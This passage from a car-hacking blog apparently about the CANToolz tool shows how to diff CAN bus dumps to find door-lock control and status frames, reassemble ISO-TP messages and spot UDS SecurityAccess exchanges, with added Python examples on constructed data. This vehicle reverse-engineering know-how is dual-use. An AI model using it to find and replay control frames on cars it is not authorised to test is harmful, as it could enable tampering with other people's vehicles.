Also put the dump files into the CANToolz root directory (noise.dump, event.dump). Now we are ready, let's start <b>CANToolz: </b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><i>python cantoolz.py -g w -c first_config.py</i></span><br />
<br />
Then just use web-browser: http://localhost:4444/index.html</div>
<div>
<br /></div>
<div>
As a result you will see CANToolz's web interface and two modules loaded: gen_replay and mod_stat.<br />
Click on mod_replay and load the noise dump. Then press START. Now you have the noise dump loaded and ready for replay. If you click "replay", all those frames will be replayed through CANToolz and will be sniffed by <b>mod_stat </b>(as the next module on the same PIPE). </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMNGhG9_EtHfSRh6U2oQ_OcykjSR6zQf09GDmE6qoHa3XpcQsL99gx9pz0rqdqBJNl4PgJEu-xugNUehRUUO0sf9ZIuCKx9OijQP6WItDEpTjRYGA80VCAOkGEnrf3zWEDzD3iHj7SgEX3/s1600/pic2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMNGhG9_EtHfSRh6U2oQ_OcykjSR6zQf09GDmE6qoHa3XpcQsL99gx9pz0rqdqBJNl4PgJEu-xugNUehRUUO0sf9ZIuCKx9OijQP6WItDEpTjRYGA80VCAOkGEnrf3zWEDzD3iHj7SgEX3/s1600/pic2.png" /></a></div>
<div>
<br /></div>
<div>
Now we need to switch the sniffing buffer in <b>mod_stat </b>to another index. For that, click on the mod_stat control, and then click <span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;">"Switch sniffing to a new buffer"</span>. After that we can go back to <b>gen_replay</b>, clean it, load event.dump and replay it. As a result, in <b>mod_stat</b> we will have two buffers with replayed CAN traffic. In the first buffer (index 0) we have the noise dump, in the second (index 1) we have the event traffic. Now we can try a simple diff: arbitration IDs that exist in the second set but not in the first. In other words: which CAN frames are unique to the second dump (by arbitration ID). For that diff, just press <span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;">"Print Diff between two buffers (new ID only)"</span><span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;">.</span></div>
<div>
<span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbrT_Rs_VPWsUrL4JNx2eCgJlQ0ewciVO2yI3OFzEZEOWGABVYDb_TVQpQbvAGG21pBlI9BLtdGn8PbpqPsHmutGTYx3gIJUVWLeKzVa3Na81zRu6TRuYEYQo1a6dxl0lBJfvWtRdqLuZg/s1600/pic3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbrT_Rs_VPWsUrL4JNx2eCgJlQ0ewciVO2yI3OFzEZEOWGABVYDb_TVQpQbvAGG21pBlI9BLtdGn8PbpqPsHmutGTYx3gIJUVWLeKzVa3Na81zRu6TRuYEYQo1a6dxl0lBJfvWtRdqLuZg/s1600/pic3.png" /></a></div>
<div>
<span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;"><br /></span></div>
<div>
With very high probability this is our answer to the first question of the task (<b>0xef81296:2:0100</b>). Why? Because this frame "fired" once during the event and was not seen before (on a real car you can validate this by sending this command and checking whether the car was really locked, but here in this test you can see that there are no other frames that look like a "command"). As you can see, this is 3 minutes of work. So this is the first part of our answer. But how do we answer the second question: <span style="font-family: "courier new" , "courier" , monospace;">Which CAN frames (ID) tell us about door statuses (find at least two)</span>? </div>
<div>
<br /></div>
<div>
The idea with "status" frames is also fairly simple. If the "<b>0xef81296</b>" control frame changes the status, then just after this frame the door "statuses" should change. So we can try to find this in the second buffer: check all messages before <b>0xef81296 </b>and then after. If the value in the frames "after" the event has changed, then it could be our "door statuses" data. This feature was not developed in CANToolz and not available during PHDays. So I am happy that at least one person (<a href="https://twitter.com/glukyne">Dr.Glukyne</a>) was able to understand this logic and develop a script to parse the dump and find changes in the traffic after the "control" frame was sent. This feature has now been added (as experimental) to <b>CANToolz 3.3.3</b>, so there is no need for manual scripting. But even without this feature in CANToolz you can get those "status" frames. The answer is in <span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;">"Print Diff between two buffers". </span>This was possible during PHDays via CANToolz. The main idea in this scenario is that the "status" frames also exist in the "noise" dump and have changed only in the event dump (after the "control" frame, but here this does not matter). We will do a diff between the two buffers, not by arbitration ID but by the CAN frame's data. For that we pass the parameters: <b>0, 1, 2. </b>(see screenshot below)<br />
<br />
0 - Index of buffer for noise diff.<br />
1 - Index of buffer for event diff<br />
2 - filter: max count of different values. We set two, because we believe that in noise it was one value, and after "control" frame was sent it changed to another. So maximum we will have two different values.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCSafk8Y3x92cJSrpTOvNKa8qWQt_2c5BECy1ylIczuVMA8IDg5IecddTIUxAKQNFno91rbMDzLVQuGZPwtLMnkOTa-BXMD_PnSRkJE2DTAX_rOjzXd4mN5-6uBcFiT1AweX9nlQIxeJXw/s1600/pic4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCSafk8Y3x92cJSrpTOvNKa8qWQt_2c5BECy1ylIczuVMA8IDg5IecddTIUxAKQNFno91rbMDzLVQuGZPwtLMnkOTa-BXMD_PnSRkJE2DTAX_rOjzXd4mN5-6uBcFiT1AweX9nlQIxeJXw/s1600/pic4.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
You can also see that we check this with <span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;">"Search ID in all buffers" </span>and see exactly what has changed in the data. But as I said, in version 3.3.3 I have implemented the idea of <b>Dr. Glukyne</b>, so let's check and compare the results of both methods:</div>
<div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2r1ICM2BMPgTdDMJotIDR-D8DTnMun4NMcrWFkEMrAQBXxh23EI1n_GDtc6queuCws2JxVHK1AaNxqvhkMWvPLespIb7gheFLsSw7tMnzxe71GlbYT9LWuXXme8ZkuQET8yWBlflaXcXz/s1600/pic5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2r1ICM2BMPgTdDMJotIDR-D8DTnMun4NMcrWFkEMrAQBXxh23EI1n_GDtc6queuCws2JxVHK1AaNxqvhkMWvPLespIb7gheFLsSw7tMnzxe71GlbYT9LWuXXme8ZkuQET8yWBlflaXcXz/s1600/pic5.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Yey! Both results correlate and are right (<b>0x12f8... are the answers</b>)! Both methods work.<br />
And I can say this is just a PoC. Right now another CANToolz developer - <b>Sergey Kononenko</b> is working on algorithms for correlation and "<b>smart event detection</b>" and we will present it at the <b><a href="http://en.mosec.org/#speech_bg">MOSEC</a></b> conference on <b>July 1 in Shanghai</b>. It will be cool!</div>
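<div>
The three diffs walked through above (new IDs only, data diff with a max-values filter, and the before/after-control-frame comparison), as an added Python example that is not CANToolz code. It assumes the ID:LENGTH:DATA_IN_HEX format described earlier; both dumps and every ID except 0xef81296 are constructed sample data, and the "stable before, stable after" rule in changed_after is an assumption of this example, not necessarily how CANToolz 3.3.3 does it.</div>

```python
from collections import defaultdict
from typing import NamedTuple


class Frame(NamedTuple):
    can_id: int
    data: bytes


def parse_dump(text):
    """Parse 'ID:LENGTH:DATA_IN_HEX' lines into Frame objects."""
    frames = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and '#' comments (comment syntax is an assumption)
        parts = line.split(":")
        if len(parts) != 3:
            raise ValueError(f"line {lineno}: expected ID:LENGTH:DATA, got {line!r}")
        can_id, length, data = int(parts[0], 16), int(parts[1]), bytes.fromhex(parts[2])
        if not 0 <= can_id <= 0x1FFFFFFF:
            raise ValueError(f"line {lineno}: arbitration ID out of 29-bit range")
        if length != len(data) or length > 8:
            raise ValueError(f"line {lineno}: LENGTH does not match DATA")
        frames.append(Frame(can_id, data))
    return frames


def values_by_id(frames):
    """Map each arbitration ID to the set of distinct payloads seen for it."""
    seen = defaultdict(set)
    for f in frames:
        seen[f.can_id].add(f.data)
    return seen


def new_ids(noise, event):
    """Diff by arbitration ID: IDs present in the event buffer only."""
    known = {f.can_id for f in noise}
    found = defaultdict(list)
    for f in event:
        if f.can_id not in known:
            found[f.can_id].append(f.data)
    return dict(found)


def few_state_ids(noise, event, max_values=2):
    """Diff by data: IDs in both buffers whose payload took at most
    max_values distinct values overall, one of them seen only in the event."""
    n, e = values_by_id(noise), values_by_id(event)
    result = {}
    for can_id in n.keys() & e.keys():
        union = n[can_id] | e[can_id]
        if 1 < len(union) <= max_values and e[can_id] - n[can_id]:
            result[can_id] = sorted(union)
    return result


def changed_after(event, control_id):
    """IDs with one stable payload before the control frame and a different
    stable payload after it. Counters that change all the time are dropped."""
    idx = next((i for i, f in enumerate(event) if f.can_id == control_id), None)
    if idx is None:
        raise ValueError(f"control frame {control_id:#x} not in buffer")
    before, after = values_by_id(event[:idx]), values_by_id(event[idx + 1:])
    result = {}
    for can_id in before.keys() & after.keys():
        b, a = before[can_id], after[can_id]
        if can_id != control_id and len(b) == 1 and len(a) == 1 and b != a:
            result[can_id] = (next(iter(b)), next(iter(a)))
    return result


# Constructed sample dumps: 0x2a0/0x2b0 play the status frames, 0x3c0 is a
# rolling counter, 0x510 never changes. Only 0xef81296:2:0100 is from the page.
NOISE = parse_dump("""
0x2a0:1:00
0x3c0:2:0001
0x2b0:2:0000
0x3c0:2:0002
0x510:3:aabbcc
0x2a0:1:00
0x3c0:2:0003
""")
EVENT = parse_dump("""
0x2a0:1:00
0x3c0:2:0004
0x2b0:2:0000
0x510:3:aabbcc
0x3c0:2:0005
0xef81296:2:0100
0x3c0:2:0006
0x2a0:1:80
0x2b0:2:0100
0x510:3:aabbcc
0x3c0:2:0007
""")

if __name__ == "__main__":
    for can_id, payloads in new_ids(NOISE, EVENT).items():
        print("new ID     ", hex(can_id), [p.hex() for p in payloads])
    for can_id, values in sorted(few_state_ids(NOISE, EVENT).items()):
        print("few states ", hex(can_id), [v.hex() for v in values])
    for can_id, (b, a) in sorted(changed_after(EVENT, 0xEF81296).items()):
        print("changed    ", hex(can_id), b.hex(), "->", a.hex())
```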
<div>
<br /></div>
<div>
P.S. On the last screenshot you can see that after the changes we have the same values (0x80) again. This is a bug in the DUMP, since I cut it wrong 8( But anyway it did not affect the hack-quest challenge. </div>
<div>
<br />
Oh yeah... and the last part: how to get the carmaker and model? This is the simplest thing. Just press <span style="background-color: white; color: teal; font-family: "courier new"; font-size: 9.6pt; font-weight: bold;">"Analyses of captured traffic". </span>Here CANToolz re-assembles a chain of a few CAN frames and detects ASCII. This ASCII will be a VIN number, which you can google to find the vendor and the model (of course this VIN is dumb-faked...).<br />
<br />
As you can see, <b>CANToolz</b> can be very helpful, and it has a lot of features and methods that can help you understand what's going on on the CAN bus! Yes... we have a somewhat difficult interface and not-well-documented details... but have u seen <b>Radare2</b>? Just silly 8))) I promise to work on the documentation and hope for your feedback etc.<br />
<br />
<b>TO BE CONTINUED ...</b></div>
<div>
<br /></div>
<div>
<br /></div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com2tag:blogger.com,1999:blog-4711612808026791519.post-6456512452549182942016-05-04T16:20:00.002-07:002016-05-15T14:25:08.974-07:00CANToolz: ISO-TP and DIFF updates<div dir="ltr" style="text-align: left;" trbidi="on">
Hello all,<br />
<br />
I want to summarize the updates and features in CANToolz that help us understand the CAN network of vehicles.<br />
<br />
First of all, I have ported CANToolz to Python 3.x and have added CANSocket support. The new module <b>hw_CANSocket</b> works with a CAN device over CAN Socket. Simple and cool.<br />
<br />
Another thing that was improved: the UDS service detection and ISO-TP detection methods in<b> mod_stat</b>. Anton Sysoev reported that this module makes mistakes in ISO-TP detection, because on his VW all ISO-TP messages are padded to 8 bytes! So I have improved <b>mod_stat</b>: it can now detect padding in ISO-TP messages. A padding feature was also added to <b>gen_ping</b>, so it is possible to generate messages with a chosen padding. As an example of how it works, you can see how Anton sniffs traffic between VAG and his car's OBDII to understand which UDS services are used (and how):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBEqxU9nGZoBAFgeWI4S11xbbgYr1KTPcgCxS6ImE7K5ZT-7_s7WKUKQBqaVbpALEetW6aRLqTHdBjkT-tQU19gww-t4oUZAwWdqdhA5IgpCYT45Yvf9h26UPqW9zH_3bGDh8K1XaUgUH1/s1600/vw1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBEqxU9nGZoBAFgeWI4S11xbbgYr1KTPcgCxS6ImE7K5ZT-7_s7WKUKQBqaVbpALEetW6aRLqTHdBjkT-tQU19gww-t4oUZAwWdqdhA5IgpCYT45Yvf9h26UPqW9zH_3bGDh8K1XaUgUH1/s640/vw1.png" width="640" /></a></div>
<br />
This is a dump of the traffic between VAG and the VW. Here we can see that two devices are talking to each other, and the padding is '0x55' in requests and '0xAA' in responses. You can also see that the ID of a UDS response equals the request's ID + 0x6A (not 0x8, which we use by default). We need to change this parameter in 'UDS shift value', and then we can try to analyze the traffic:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_0PmBxth4yQaxcHlW-uQH5e4dEnZHgPjUfiUPmhxmbJ-ajEfVMApWRI_4HDsHaGtLN0Mds_eeXBlZIXJJK_3DjxAuyZkjqVpqLi-b4HDn_UirbiXeCEpT1St2y15Tb3l2gR5r1N9FGEIh/s1600/vw2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_0PmBxth4yQaxcHlW-uQH5e4dEnZHgPjUfiUPmhxmbJ-ajEfVMApWRI_4HDsHaGtLN0Mds_eeXBlZIXJJK_3DjxAuyZkjqVpqLi-b4HDn_UirbiXeCEpT1St2y15Tb3l2gR5r1N9FGEIh/s640/vw2.png" width="640" /></a></div>
<br />
Wow! It works. Thx Andrey for testing this on your car and for the feedback and advice. So here we can see that CANToolz can re-assemble ISO-TP messages and find UDS services! Yes, you can see an ERROR in 'security access', but this is because VW uses unknown (not default?) sub-commands, which CANToolz does not understand by default. But anyway we were able to get the CHALLENGE and RESPONSE in security access. It looks like there is another problem, but it is out of our topic, and maybe Andrey will discover what he has found later. So here I am happy just because in general my UDS detection works <strike>very</strike> <strike>good</strike>. We could do more and find how to enable and disable this feature in the ECU, and then do the same action from CANToolz, without VAG anymore. But this is another story...<br />
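The two adjustments described above, as an added example that is not CANToolz code: ISO-TP reassembly that trusts the declared length (so padding is dropped and recorded), and UDS request/response pairing with a configurable ID shift. The arbitration IDs 0x714/0x77E, the frame contents and all function names are constructed for illustration.

```python
from collections import Counter

UDS_NAMES = {0x10: "DiagnosticSessionControl", 0x22: "ReadDataByIdentifier",
             0x27: "SecurityAccess", 0x3E: "TesterPresent"}


class IsoTpReassembler:
    """Rebuilds ISO-TP (ISO 15765-2, normal addressing) payloads per arbitration ID."""

    def __init__(self):
        self.pending = {}   # can_id -> [declared_length, bytearray, next_sequence]
        self.padding = {}   # can_id -> Counter of filler bytes seen after the payload

    def _note_padding(self, can_id, tail):
        # Bytes after the declared payload count as padding if they are all equal.
        if tail and len(set(tail)) == 1:
            self.padding.setdefault(can_id, Counter())[tail[0]] += 1

    def padding_bytes(self):
        return {cid: c.most_common(1)[0][0] for cid, c in self.padding.items()}

    def feed(self, can_id, data):
        """Return a complete payload as bytes, or None while a message is incomplete."""
        if not data:
            return None
        kind, low = data[0] >> 4, data[0] & 0x0F
        if kind == 0:                                   # single frame
            if not 1 <= low <= len(data) - 1:
                return None
            self._note_padding(can_id, data[1 + low:])
            return bytes(data[1:1 + low])
        if kind == 1 and len(data) >= 3:                # first frame
            length = (low << 8) | data[1]
            if length >= 8:                             # shorter would fit a single frame
                self.pending[can_id] = [length, bytearray(data[2:]), 1]
            return None
        if kind == 2 and can_id in self.pending:        # consecutive frame
            state = self.pending[can_id]
            length, buf, seq = state
            if low != seq:                              # lost or reordered frame: give up
                del self.pending[can_id]
                return None
            chunk = data[1:1 + (length - len(buf))]
            buf.extend(chunk)
            self._note_padding(can_id, data[1 + len(chunk):])
            state[2] = (seq + 1) & 0x0F
            if len(buf) >= length:
                del self.pending[can_id]
                return bytes(buf[:length])
            return None
        if kind == 3:                                   # flow control: 3 bytes, rest is filler
            self._note_padding(can_id, data[3:])
        return None


def analyse(frames, shift=0x08):
    """Pair UDS requests with responses sent on (request ID + shift)."""
    reasm = IsoTpReassembler()
    open_requests, exchanges = {}, []
    for can_id, data in frames:
        payload = reasm.feed(can_id, data)
        if payload is None:
            continue
        request = open_requests.get(can_id - shift)
        status = None
        if request is not None:
            if payload[0] == request[0] + 0x40:
                status = "positive"
            elif len(payload) >= 3 and payload[0] == 0x7F and payload[1] == request[0]:
                status = "negative"
        if status is None:
            open_requests[can_id] = payload             # treat as a (possible) request
            continue
        del open_requests[can_id - shift]
        exchanges.append({"request_id": can_id - shift, "response_id": can_id,
                          "service": UDS_NAMES.get(request[0], hex(request[0])),
                          "status": status, "request": request, "response": payload})
    return exchanges, reasm.padding_bytes()


# Constructed capture: tester on 0x714 pads with 0x55, ECU on 0x77E pads with 0xAA.
SAMPLE_FRAMES = [(cid, bytes.fromhex(h)) for cid, h in [
    (0x714, "0227015555555555"),   # SecurityAccess, request seed
    (0x77E, "06670111223344aa"),   # positive response carrying a 4-byte seed
    (0x714, "062702a1b2c3d455"),   # SecurityAccess, send key
    (0x77E, "037f2735aaaaaaaa"),   # negative response
    (0x714, "0322f18755555555"),   # ReadDataByIdentifier
    (0x77E, "100a62f187504152"),   # first frame, declared length 10
    (0x714, "3000005555555555"),   # flow control from the tester
    (0x77E, "2154303031aaaaaa"),   # consecutive frame, last 3 bytes are padding
]]

if __name__ == "__main__":
    found, pads = analyse(SAMPLE_FRAMES, shift=0x6A)
    for e in found:
        print(hex(e["request_id"]), e["service"], e["status"], e["response"].hex())
    print({hex(k): hex(v) for k, v in pads.items()})
```

With the default shift of 0x8 the same capture yields no paired exchanges, which is the symptom that the 'UDS shift value' needs changing.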
<br />
One more important update is related to DIFF mode. Now it is more functional and useful! Again, let's see these features on a real example provided by <a href="https://twitter.com/Z0ha4" style="background: 0px 0px rgb(255, 255, 255); box-sizing: border-box; color: #3a6d99; cursor: pointer; font-family: Tahoma, sans-serif, Arial, Helvetica; font-size: 13px; line-height: 19.5px; outline: 0px; white-space: pre-wrap;">@Z0ha4</a>. He has a BMW, and he is also preparing it for Hardware Village Russia. He is going to use the DIFF feature of CANToolz to find useful control messages in CAN. He will tell more about this at <a href="http://www.phdays.com/">PHDays</a>, but I want to tell you about the CANToolz DIFF mode, which has changed a little bit. It now supports multiple buffers, so you can name them and dump traffic into them separately; later you can do DIFFs between those buffers and dump the buffers or just the diffs. For that, use the command "<span style="background-color: white; color: green; font-family: "courier new"; font-weight: bold;">Switch sniffing to a new buffer</span>"; you can give the buffer a name. In general you need white-noise traffic as the baseline set (a set with no actions, against which you do all diffs to find actions in the other sets). Just start the car and dump CAN traffic for one minute. Then stop <b>mod_stat </b>and use "<span style="background-color: white; color: green; font-family: "courier new"; font-weight: bold;">Switch sniffing to a new buffer</span>" to create a new buffer. You can name it if you want, for example: "Windows Down/Up action". Then activate <b>mod_stat</b> and do these actions in the car. Right after that you can stop <b>mod_stat</b> and think about the next actions. Then repeat: create a buffer, activate <b>mod_stat</b>, do an action, disable <b>mod_stat</b> (or stop sniffing, because we do not need noisy frames in those buffers). After that you will have buffers with all the actions:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMYeYt20FWPZSt_ZTqTC9EK1qXh8YozkSsNumBrD8KE6GZ1t52vERNchJm1ZduU23sGB8hTV2lFXlFG46F7kMAEFMAH8iz3YFkMfsy54qVhAXaZh5WkYWwOJoGGZvOhv2-kIeU0TEGQKY8/s1600/dif_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMYeYt20FWPZSt_ZTqTC9EK1qXh8YozkSsNumBrD8KE6GZ1t52vERNchJm1ZduU23sGB8hTV2lFXlFG46F7kMAEFMAH8iz3YFkMfsy54qVhAXaZh5WkYWwOJoGGZvOhv2-kIeU0TEGQKY8/s640/dif_1.png" width="640" /></a></div>
<br />
You can do a DIFF between any two buffers by using their indexes (by default the last two buffers are compared). Here we are trying to find the CAN frames of the windows action:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3aSp73BPe04H8zJsrPFnphZxAg154tIu_R2yqo5sS_vs1quR_TCBuOpiz5jbE9rUHUw8vR2NnioVRxOFaV-zxuavMVnc4r3r72Ot42r717FptXnAEc4L7Rjt2bAYp5XX3HRO_pgdzwVFL/s1600/dif_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3aSp73BPe04H8zJsrPFnphZxAg154tIu_R2yqo5sS_vs1quR_TCBuOpiz5jbE9rUHUw8vR2NnioVRxOFaV-zxuavMVnc4r3r72Ot42r717FptXnAEc4L7Rjt2bAYp5XX3HRO_pgdzwVFL/s640/dif_2.png" width="640" /></a></div>
<br />
We are using "<span style="background-color: white; color: green; font-family: "courier new"; font-weight: bold;">Print Diff between two buffers (new ID only)</span>" to find only frames with an ID that was not sniffed in the "white-noise" buffer. Frames with ID 0xFA look exactly like what we are looking for. Of course we can dump this diff and do a replay, or do something else, but let me show you another simple thing that can help us validate our guess: searching by ID. Yes, a simple search. Let's search for this ID (0xFA) in all buffers:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPT8_eNx6HZO8H62BtzKVSBM_AbEFcWhK2eiSy3e8OWqX-7g8fYGgReQ3_fmX-wlCrGrD2oIZIoMIRkSrgOCmldJDfOUc-Y07Ssk0yQJQlwX7q3rck_GhPlpDAzDgY-cdCQd5evQRRs3tf/s1600/dif_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPT8_eNx6HZO8H62BtzKVSBM_AbEFcWhK2eiSy3e8OWqX-7g8fYGgReQ3_fmX-wlCrGrD2oIZIoMIRkSrgOCmldJDfOUc-Y07Ssk0yQJQlwX7q3rck_GhPlpDAzDgY-cdCQd5evQRRs3tf/s640/dif_3.png" width="640" /></a></div>
<br />
As a result we can see that this ID (0xFA) is found only in the dump related to the car's window action. The low value of the ID also tells us that it looks like what we want. Later we can find which frames relate to the up or down action and which bits mean what, but we will cover this later.<br />
<br />
And once again I want to thank the whole Hardware Village community for the feedback about CANToolz and the good advice. All these examples were done by them just for fun and because they are enthusiasts! So I can improve CANToolz because of the community's help, and that is great. Anyway, in the last 3 months (this tool is very young, as you can see) we have had >200 commits, and new awesome features will be added soon! Yes, maybe the Front-End/GUI part is not so awesome and we lack documentation, but anyway I find this project very useful not only for fun and CarHacking, but also for OEM/Vendor internal tests and automation (security), and we will talk about this later, for sure. </div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com4tag:blogger.com,1999:blog-4711612808026791519.post-11810503175089467372016-04-17T05:03:00.002-07:002016-04-19T08:58:05.978-07:00CANToolz: mod_stat - diff mode<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Small updates in <b>CANToolz</b> in version 1.5-0:<br />
<br />
I have added a DIFF mode to the <b>mod_stat </b>module. This can be useful if you want to find which frames are new in the traffic. For example, you have a traffic dump, then you enable diff mode and do some action, like a door unlock. Right after that you can press "print diff" and see all CAN frames that were seen on the CAN bus after enabling DIFF mode but not before. Of course there will be a lot of unneeded traffic as well, but it should still reduce the amount of traffic for manual analysis. If you press "print DIFF (ID only)", you will see only those CAN frames whose arbitration ID is not known (not present in the original dump, before diff mode was enabled).<br />
<br />
When you disable DIFF mode, all CAN frames will be merged into the original mod_stat buffer, so you can repeat this action again and again... Finally you can DUMP the diff frames and replay them. This should work faster than "binary search".<br />
<br />
<b>UPD: </b><br />
------------------------<br />
Let me show this on a real example (it will be part of the Hardware Village Car Hacking Workshop). My friends from Moscow have sent me a few dumps of the traffic. Each dump contains one action performed in a Honda Civic (9th generation). One of the actions was 'locking doors'. On that bus we do not have 'control' frames, but we have 'status' frames, so let's try to find them! Now I can work remotely with those dumps to understand the difference between the sets and find the 'doors status' messages. First of all I will load and replay all the other dumps as 'white noise'. In this traffic we should have the status "door unlocked":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhikB96woi5_av9pTlsfxxwKlr8VQgqsvN5PO_AI3beGRcN-1KXniKZ2coWYKOHrG-ts-Rs_J-fJE-e19_B3WaEIHY_pO-09Dqzq7nyYDq-yMeic0-utB8fML-1L5poOi5OfBX7OZylHWO_/s1600/h1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="452" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhikB96woi5_av9pTlsfxxwKlr8VQgqsvN5PO_AI3beGRcN-1KXniKZ2coWYKOHrG-ts-Rs_J-fJE-e19_B3WaEIHY_pO-09Dqzq7nyYDq-yMeic0-utB8fML-1L5poOi5OfBX7OZylHWO_/s640/h1.png" width="640" /></a></div>
<div style="text-align: right;">
Loading and replaying traffic with "white noise".</div>
<br />
Then I will switch to <b>mod_stat </b>and enable DIFF mode. After that I can go back to <b>gen_replay</b>, clean its memory and load/replay the dump with the status "doors are locked". That's it, now we print the DIFF in <b>mod_stat:</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQyhuoAKjQu4pgi5CWacRLhq_khr_AFtXLJKge8rk9VAEyl8Fm2HS7JGbI3AAex0qkFKnit8MgX0dWsSzdjP5xK38cY0_KJLXMjWKcJMI3dTmEUfUwUHJzo_6RS_49jtuXVflzxhYKNz3t/s1600/h2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQyhuoAKjQu4pgi5CWacRLhq_khr_AFtXLJKge8rk9VAEyl8Fm2HS7JGbI3AAex0qkFKnit8MgX0dWsSzdjP5xK38cY0_KJLXMjWKcJMI3dTmEUfUwUHJzo_6RS_49jtuXVflzxhYKNz3t/s640/h2.png" width="640" /></a></div>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: right;">
Print difference sets of CAN frames</div>
<br />
Here we can see a bunch of CAN frames. (Let's also dump them into a file for more detailed analysis later.) We can see new values (0) for known arbitration IDs (318259472/318255632). These look like door lock statuses (0x0 means locked, because before it was a different value, 0x80; you can use the "Print current table" button to see what was there before). This value has changed only in this dump, so with 99% confidence we can say these are the door lock statuses. Easy, and I am happy to see that this DIFF idea works fine in practice and that CANToolz can help my friends in Moscow! Stay tuned -)<br />
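The DIFF logic described in this post and in the multi-buffer update above, as an added example that is not CANToolz code: named buffers, a diff that reports new frames, an "ID only" diff, and a search by ID across buffers. The class and method names are hypothetical and the frame data is constructed; only the IDs 0xFA and 318259472/318255632 and the 0x80 to 0x0 change are taken from the posts.

```python
class DiffBuffers:
    """Named capture buffers with the two DIFF views and a search by arbitration ID."""

    def __init__(self):
        self.buffers = []                       # list of [name, [(can_id, data), ...]]

    def new_buffer(self, name=None):
        """Switch sniffing to a new buffer and return its index."""
        self.buffers.append([name or "buffer %d" % len(self.buffers), []])
        return len(self.buffers) - 1

    def sniff(self, can_id, data):
        self.buffers[-1][1].append((can_id, bytes(data)))

    def diff(self, old=-2, new=-1, id_only=False):
        """Unique frames of buffer `new` that are absent from buffer `old`.

        id_only=True keeps only frames whose arbitration ID never occurs in `old`;
        otherwise a known ID carrying a previously unseen value is reported too.
        """
        baseline = self.buffers[old][1]
        known_ids = {cid for cid, _ in baseline}
        known_frames = set(baseline)
        result = []
        for frame in self.buffers[new][1]:
            if frame in result:
                continue
            if frame[0] not in known_ids or (not id_only and frame not in known_frames):
                result.append(frame)
        return result

    def search(self, can_id):
        """Map buffer name -> distinct data values seen for this ID."""
        hits = {}
        for name, frames in self.buffers:
            values = sorted({data for cid, data in frames if cid == can_id})
            if values:
                hits[name] = values
        return hits


def build_sample():
    """Constructed traffic: one white-noise baseline and two action captures."""
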